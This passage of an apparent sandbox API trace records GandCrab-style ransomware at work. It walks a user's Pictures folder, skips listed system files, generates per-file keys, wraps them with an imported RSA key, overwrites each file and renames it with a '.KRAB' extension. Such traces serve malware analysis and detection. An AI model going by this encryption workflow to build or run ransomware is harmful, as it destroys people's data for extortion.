(lpString1="tqAGKf0.jpg", lpString2="ntuser.dat.log") returned 1 [0097.884] lstrcmpiW (lpString1="tqAGKf0.jpg", lpString2="thumbs.db") returned 1 [0097.884] lstrcmpiW (lpString1="tqAGKf0.jpg", lpString2="KRAB-DECRYPT.html") returned 1 [0097.884] lstrcmpiW (lpString1="tqAGKf0.jpg", lpString2="KRAB-DECRYPT.txt") returned 1 [0097.884] lstrcmpiW (lpString1="tqAGKf0.jpg", lpString2="CRAB-DECRYPT.txt") returned 1 [0097.884] lstrcmpiW (lpString1="tqAGKf0.jpg", lpString2="ntldr") returned 1 [0097.884] lstrcmpiW (lpString1="tqAGKf0.jpg", lpString2="NTDETECT.COM") returned 1 [0097.884] lstrcmpiW (lpString1="tqAGKf0.jpg", lpString2="Bootfont.bin") returned 1 [0097.884] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0097.884] CryptAcquireContextW (in: phProv=0x338ec34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338ec34*=0x1010df8) returned 1 [0097.885] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0097.885] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0097.885] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0097.885] CryptGenRandom (in: hProv=0x1010df8, dwLen=0x20, pbBuffer=0x338eccc | out: pbBuffer=0x338eccc) returned 1 [0097.885] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0097.885] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.886] CryptAcquireContextW (in: phProv=0x338ec34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338ec34*=0x1011898) returned 1 [0097.886] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0097.886] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0097.887] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0097.887] CryptGenRandom (in: hProv=0x1011898, dwLen=0x8, pbBuffer=0x338ecec | out: pbBuffer=0x338ecec) returned 1 [0097.887] CryptReleaseContext (hProv=0x1011898, dwFlags=0x0) returned 1 [0097.887] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.887] CryptAcquireContextW (in: phProv=0x338ec2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338ec2c*=0x1011898) returned 1 [0097.887] CryptImportKey (in: hProv=0x1011898, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338ec30 | out: phKey=0x338ec30*=0xfbd5a0) returned 1 [0097.888] CryptGetKeyParam (in: hKey=0xfbd5a0, dwParam=0x8, pbData=0x338ec24, pdwDataLen=0x338ec28, dwFlags=0x0 | out: pbData=0x338ec24*=0x800, pdwDataLen=0x338ec28*=0x4) returned 1 [0097.888] CryptEncrypt (in: hKey=0xfbd5a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338ec5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338ec5c*=0x100) returned 1 [0097.888] GetLastError () returned 0x0 [0097.888] CryptDestroyKey (hKey=0xfbd5a0) returned 1 [0097.888] CryptReleaseContext (hProv=0x1011898, dwFlags=0x0) returned 1 [0097.888] CryptAcquireContextW (in: phProv=0x338ec2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338ec2c*=0x1010df8) returned 1 [0097.888] CryptImportKey (in: hProv=0x1010df8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338ec30 | out: phKey=0x338ec30*=0xfbd5a0) returned 1 [0097.888] CryptGetKeyParam (in: hKey=0xfbd5a0, dwParam=0x8, pbData=0x338ec24, pdwDataLen=0x338ec28, dwFlags=0x0 | out: pbData=0x338ec24*=0x800, pdwDataLen=0x338ec28*=0x4) returned 1 [0097.888] CryptEncrypt (in: hKey=0xfbd5a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338ec5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338ec5c*=0x100) returned 1 [0097.889] GetLastError () returned 0x0 [0097.889] CryptDestroyKey (hKey=0xfbd5a0) returned 1 [0097.889] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0097.889] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\tqAGKf0.jpg" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\rkknroy7mtqm7yma8hq\\tpxohu-l\\tqagkf0.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x778 [0097.889] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0097.890] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0097.890] ReadFile (in: hFile=0x778, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ecfc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ecfc*=0x159f3, lpOverlapped=0x0) returned 1 [0097.906] SetFilePointerEx (in: hFile=0x778, liDistanceToMove=0xfffea60d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0097.906] WriteFile (in: hFile=0x778, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x159f3, lpNumberOfBytesWritten=0x338ecf8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ecf8*=0x159f3, lpOverlapped=0x0) returned 1 [0097.906] WriteFile (in: hFile=0x778, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ecf8, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338ecf8*=0x208, lpOverlapped=0x0) returned 1 [0097.906] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.911] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.911] CloseHandle (hObject=0x778) returned 1 [0097.911] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.912] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\tqAGKf0.jpg" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\rkknroy7mtqm7yma8hq\\tpxohu-l\\tqagkf0.jpg"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\tqAGKf0.jpg.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\rkknroy7mtqm7yma8hq\\tpxohu-l\\tqagkf0.jpg.krab")) returned 1 [0097.912] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.913] FindNextFileW (in: hFindFile=0xfbd3e0, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 1 [0097.913] lstrcmpW (lpString1="XGx31JJgPT8aU.bmp", lpString2=".") returned 1 [0097.913] lstrcmpW (lpString1="XGx31JJgPT8aU.bmp", lpString2="..") returned 1 [0097.913] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\", lpString2="XGx31JJgPT8aU.bmp" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\XGx31JJgPT8aU.bmp") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\XGx31JJgPT8aU.bmp" [0097.913] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0097.913] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\XGx31JJgPT8aU.bmp.KRAB") returned 82 [0097.913] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\XGx31JJgPT8aU.bmp") returned 77 [0097.913] lstrlenW (lpString=".bmp") returned 4 [0097.913] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0097.913] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".bmp ") returned 5 [0097.914] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.914] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\XGx31JJgPT8aU.bmp") returned 77 [0097.914] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\XGx31JJgPT8aU.bmp") returned 77 [0097.914] lstrcmpiW (lpString1="XGx31JJgPT8aU.bmp", lpString2="desktop.ini") returned 1 [0097.914] lstrcmpiW (lpString1="XGx31JJgPT8aU.bmp", lpString2="autorun.inf") returned 1 [0097.914] lstrcmpiW (lpString1="XGx31JJgPT8aU.bmp", lpString2="ntuser.dat") returned 1 [0097.914] lstrcmpiW (lpString1="XGx31JJgPT8aU.bmp", lpString2="iconcache.db") returned 1 [0097.914] lstrcmpiW (lpString1="XGx31JJgPT8aU.bmp", lpString2="bootsect.bak") returned 1 [0097.914] lstrcmpiW (lpString1="XGx31JJgPT8aU.bmp", lpString2="boot.ini") returned 1 [0097.914] lstrcmpiW (lpString1="XGx31JJgPT8aU.bmp", lpString2="ntuser.dat.log") returned 1 [0097.914] lstrcmpiW (lpString1="XGx31JJgPT8aU.bmp", lpString2="thumbs.db") returned 1 [0097.914] lstrcmpiW (lpString1="XGx31JJgPT8aU.bmp", lpString2="KRAB-DECRYPT.html") returned 1 [0097.914] lstrcmpiW (lpString1="XGx31JJgPT8aU.bmp", lpString2="KRAB-DECRYPT.txt") returned 1 [0097.914] lstrcmpiW (lpString1="XGx31JJgPT8aU.bmp", lpString2="CRAB-DECRYPT.txt") returned 1 [0097.914] lstrcmpiW (lpString1="XGx31JJgPT8aU.bmp", lpString2="ntldr") returned 1 [0097.914] lstrcmpiW (lpString1="XGx31JJgPT8aU.bmp", lpString2="NTDETECT.COM") returned 1 [0097.914] lstrcmpiW (lpString1="XGx31JJgPT8aU.bmp", lpString2="Bootfont.bin") returned 1 [0097.914] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0097.914] CryptAcquireContextW (in: phProv=0x338ec34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338ec34*=0x1011458) returned 1 [0097.915] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0097.915] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0097.915] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0097.916] CryptGenRandom (in: hProv=0x1011458, dwLen=0x20, pbBuffer=0x338eccc | out: pbBuffer=0x338eccc) returned 1 [0097.916] CryptReleaseContext (hProv=0x1011458, dwFlags=0x0) returned 1 [0097.916] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.916] CryptAcquireContextW (in: phProv=0x338ec34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338ec34*=0x1011898) returned 1 [0097.916] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0097.917] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0097.917] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0097.917] CryptGenRandom (in: hProv=0x1011898, dwLen=0x8, pbBuffer=0x338ecec | out: pbBuffer=0x338ecec) returned 1 [0097.917] CryptReleaseContext (hProv=0x1011898, dwFlags=0x0) returned 1 [0097.917] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.917] CryptAcquireContextW (in: phProv=0x338ec2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338ec2c*=0x1011678) returned 1 [0097.918] CryptImportKey (in: hProv=0x1011678, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338ec30 | out: phKey=0x338ec30*=0xfbd5a0) returned 1 [0097.918] CryptGetKeyParam (in: hKey=0xfbd5a0, dwParam=0x8, pbData=0x338ec24, pdwDataLen=0x338ec28, dwFlags=0x0 | out: pbData=0x338ec24*=0x800, pdwDataLen=0x338ec28*=0x4) returned 1 [0097.918] CryptEncrypt (in: hKey=0xfbd5a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338ec5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338ec5c*=0x100) returned 1 [0097.918] GetLastError () returned 0x0 [0097.918] CryptDestroyKey (hKey=0xfbd5a0) returned 1 [0097.918] CryptReleaseContext (hProv=0x1011678, dwFlags=0x0) returned 1 [0097.918] CryptAcquireContextW (in: phProv=0x338ec2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338ec2c*=0x1011458) returned 1 [0097.918] CryptImportKey (in: hProv=0x1011458, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338ec30 | out: phKey=0x338ec30*=0xfbd5a0) returned 1 [0097.918] CryptGetKeyParam (in: hKey=0xfbd5a0, dwParam=0x8, pbData=0x338ec24, pdwDataLen=0x338ec28, dwFlags=0x0 | out: pbData=0x338ec24*=0x800, pdwDataLen=0x338ec28*=0x4) returned 1 [0097.919] CryptEncrypt (in: hKey=0xfbd5a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338ec5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338ec5c*=0x100) returned 1 [0097.919] GetLastError () returned 0x0 [0097.919] CryptDestroyKey (hKey=0xfbd5a0) returned 1 [0097.919] CryptReleaseContext (hProv=0x1011458, dwFlags=0x0) returned 1 [0097.919] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\XGx31JJgPT8aU.bmp" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\rkknroy7mtqm7yma8hq\\tpxohu-l\\xgx31jjgpt8au.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x778 [0097.919] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0097.920] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0097.920] ReadFile (in: hFile=0x778, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ecfc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ecfc*=0x133f2, lpOverlapped=0x0) returned 1 [0097.934] SetFilePointerEx (in: hFile=0x778, liDistanceToMove=0xfffecc0e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0097.934] WriteFile (in: hFile=0x778, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x133f2, lpNumberOfBytesWritten=0x338ecf8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ecf8*=0x133f2, lpOverlapped=0x0) returned 1 [0097.934] WriteFile (in: hFile=0x778, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ecf8, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338ecf8*=0x208, lpOverlapped=0x0) returned 1 [0097.934] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.938] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.940] CloseHandle (hObject=0x778) returned 1 [0097.941] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.941] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\XGx31JJgPT8aU.bmp" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\rkknroy7mtqm7yma8hq\\tpxohu-l\\xgx31jjgpt8au.bmp"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\XGx31JJgPT8aU.bmp.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\rkknroy7mtqm7yma8hq\\tpxohu-l\\xgx31jjgpt8au.bmp.krab")) returned 1 [0097.942] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.942] FindNextFileW (in: hFindFile=0xfbd3e0, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 1 [0097.942] lstrcmpW (lpString1="YBze.png", lpString2=".") returned 1 [0097.942] lstrcmpW (lpString1="YBze.png", lpString2="..") returned 1 [0097.942] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\", lpString2="YBze.png" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\YBze.png") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\YBze.png" [0097.942] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0097.942] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\YBze.png.KRAB") returned 73 [0097.942] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\YBze.png") returned 68 [0097.942] lstrlenW (lpString=".png") returned 4 [0097.942] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0097.943] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".png ") returned 5 [0097.943] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.943] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\YBze.png") returned 68 [0097.943] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\YBze.png") returned 68 [0097.943] lstrcmpiW (lpString1="YBze.png", lpString2="desktop.ini") returned 1 [0097.943] lstrcmpiW (lpString1="YBze.png", lpString2="autorun.inf") returned 1 [0097.943] lstrcmpiW (lpString1="YBze.png", lpString2="ntuser.dat") returned 1 [0097.943] lstrcmpiW (lpString1="YBze.png", lpString2="iconcache.db") returned 1 [0097.943] lstrcmpiW (lpString1="YBze.png", lpString2="bootsect.bak") returned 1 [0097.943] lstrcmpiW (lpString1="YBze.png", lpString2="boot.ini") returned 1 [0097.943] lstrcmpiW (lpString1="YBze.png", lpString2="ntuser.dat.log") returned 1 [0097.943] lstrcmpiW (lpString1="YBze.png", lpString2="thumbs.db") returned 1 [0097.943] lstrcmpiW (lpString1="YBze.png", lpString2="KRAB-DECRYPT.html") returned 1 [0097.943] lstrcmpiW (lpString1="YBze.png", lpString2="KRAB-DECRYPT.txt") returned 1 [0097.943] lstrcmpiW (lpString1="YBze.png", lpString2="CRAB-DECRYPT.txt") returned 1 [0097.943] lstrcmpiW (lpString1="YBze.png", lpString2="ntldr") returned 1 [0097.943] lstrcmpiW (lpString1="YBze.png", lpString2="NTDETECT.COM") returned 1 [0097.943] lstrcmpiW (lpString1="YBze.png", lpString2="Bootfont.bin") returned 1 [0097.943] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0097.944] CryptAcquireContextW (in: phProv=0x338ec34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338ec34*=0x1011678) returned 1 [0097.944] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0097.944] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0097.945] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0097.945] CryptGenRandom (in: hProv=0x1011678, dwLen=0x20, pbBuffer=0x338eccc | out: pbBuffer=0x338eccc) returned 1 [0097.945] CryptReleaseContext (hProv=0x1011678, dwFlags=0x0) returned 1 [0097.945] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.945] CryptAcquireContextW (in: phProv=0x338ec34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338ec34*=0x1010df8) returned 1 [0097.945] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0097.946] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0097.946] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0097.946] CryptGenRandom (in: hProv=0x1010df8, dwLen=0x8, pbBuffer=0x338ecec | out: pbBuffer=0x338ecec) returned 1 [0097.946] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0097.946] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.946] CryptAcquireContextW (in: phProv=0x338ec2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338ec2c*=0x10113d0) returned 1 [0097.947] CryptImportKey (in: hProv=0x10113d0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338ec30 | out: phKey=0x338ec30*=0xfbd5a0) returned 1 [0097.947] CryptGetKeyParam (in: hKey=0xfbd5a0, dwParam=0x8, pbData=0x338ec24, pdwDataLen=0x338ec28, dwFlags=0x0 | out: pbData=0x338ec24*=0x800, pdwDataLen=0x338ec28*=0x4) returned 1 [0097.947] CryptEncrypt (in: hKey=0xfbd5a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338ec5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338ec5c*=0x100) returned 1 [0097.947] GetLastError () returned 0x0 [0097.947] CryptDestroyKey (hKey=0xfbd5a0) returned 1 [0097.947] CryptReleaseContext (hProv=0x10113d0, dwFlags=0x0) returned 1 [0097.947] CryptAcquireContextW (in: phProv=0x338ec2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338ec2c*=0x1010df8) returned 1 [0097.948] CryptImportKey (in: hProv=0x1010df8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338ec30 | out: phKey=0x338ec30*=0xfbd5a0) returned 1 [0097.948] CryptGetKeyParam (in: hKey=0xfbd5a0, dwParam=0x8, pbData=0x338ec24, pdwDataLen=0x338ec28, dwFlags=0x0 | out: pbData=0x338ec24*=0x800, pdwDataLen=0x338ec28*=0x4) returned 1 [0097.948] CryptEncrypt (in: hKey=0xfbd5a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338ec5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338ec5c*=0x100) returned 1 [0097.948] GetLastError () returned 0x0 [0097.948] CryptDestroyKey (hKey=0xfbd5a0) returned 1 [0097.948] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0097.948] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\YBze.png" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\rkknroy7mtqm7yma8hq\\tpxohu-l\\ybze.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x778 [0097.949] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0097.949] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0097.949] ReadFile (in: hFile=0x778, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ecfc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ecfc*=0x11349, lpOverlapped=0x0) returned 1 [0097.962] SetFilePointerEx (in: hFile=0x778, liDistanceToMove=0xfffeecb7, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0097.962] WriteFile (in: hFile=0x778, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x11349, lpNumberOfBytesWritten=0x338ecf8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ecf8*=0x11349, lpOverlapped=0x0) returned 1 [0097.962] WriteFile (in: hFile=0x778, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ecf8, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338ecf8*=0x208, lpOverlapped=0x0) returned 1 [0097.962] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.966] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.966] CloseHandle (hObject=0x778) returned 1 [0097.967] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.967] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\YBze.png" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\rkknroy7mtqm7yma8hq\\tpxohu-l\\ybze.png"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\YBze.png.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\rkknroy7mtqm7yma8hq\\tpxohu-l\\ybze.png.krab")) returned 1 [0097.968] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.968] FindNextFileW (in: hFindFile=0xfbd3e0, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 0 [0097.968] FindClose (in: hFindFile=0xfbd3e0 | out: hFindFile=0xfbd3e0) returned 1 [0097.968] CloseHandle (hObject=0x3a8) returned 1 [0097.968] FindNextFileW (in: hFindFile=0xfbd7a0, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 1 [0097.968] lstrcmpW (lpString1="vdI0_fsaRpZ1Fio.bmp", lpString2=".") returned 1 [0097.968] lstrcmpW (lpString1="vdI0_fsaRpZ1Fio.bmp", lpString2="..") returned 1 [0097.968] lstrcatW (in: 